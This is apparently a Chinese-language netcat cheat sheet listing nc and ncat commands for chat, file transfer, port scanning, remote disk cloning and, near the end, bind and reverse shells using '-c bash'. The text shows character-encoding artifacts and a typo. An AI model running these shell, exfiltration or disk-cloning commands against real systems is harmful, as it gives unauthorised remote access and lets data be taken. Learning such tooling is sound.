查看頭文件
nc -nv 0.0.0.0 IP地址 80 端口號(類telnet功能)
head /
聊天功能(傳輸是明文)
nc相互傳輸文本信息(兩臺電腦實現(xiàn)類聊天功能)
A:nc -lp 4444(打開監(jiān)聽一個端口)
B:nc -nv 0.0.0.0(目標(biāo)IP) 4444
電子取證
文件收集
nc -lp 4444 > ps.txt(將4444端口接受的信息直接傳到ps.txt进陡,可以當(dāng)日志查看自己的端口是否有被入侵)
ps aux | nc -nv 0.0.0.0 4444 -q 1(將進(jìn)程信息發(fā)給4444端口一秒后退出)
lsof(收集系統(tǒng)的所有打開文件的內(nèi)容)
收集目錄(將文件進(jìn)行打包)
tar -cvf - sublime/ | nc -lp 333 -q 1(nc -lp 333 -q1<atr -cvf - sublime/)
nc -nv 0.0.0.0 333 | tar -xvf -(nc -nv 0.0.0.0 333>tar -xvf -)
加密傳輸文件
nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > aaa.txt
mcrypt --flush -Fbqd -a rijndael-256 -m ecb < aaa.txt | nc -nv 0.0.0.0 333 -q 1
流媒體服務(wù)器
cat 1.mp4 | nc -lp 333
nc -nv 0.0.0.0 333 | mplayer -vo x11 -cache 3000 -
端口掃描
nc -nvz 0.0.0.0 1-65535
nc -nvzu 0.0.0.0 1-1024(查看1-1024的udp端口)
遠(yuǎn)程克隆硬盤
nc -lp 333 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 0.0.0.0 333 -q 1
遠(yuǎn)程控制
正向
nc -lp 333 -c bash(Windows用cmd)
nc -nv 0.0.0.0 333
反向(在目標(biāo)服務(wù)器開啟可連端口執(zhí)行nc就可以實現(xiàn)第二次訪問)
nc -lp 333
nc -nv 0.0.0.0 333 -c bash
-c bash 就是可獲取本地的bash窗口(在哪里獲取哪里的)
ncat(由于nc是不加密的,明文傳輸容易被嗅探,我們也可以用ncat)
建立遠(yuǎn)程連接(ssl加密)
ncat -c bash --allow 0.0.0.0 -nvl 333 --ssl(--allow允許一個指定IP連接)
ncat -nv 0.0.0.0 333 --ssl
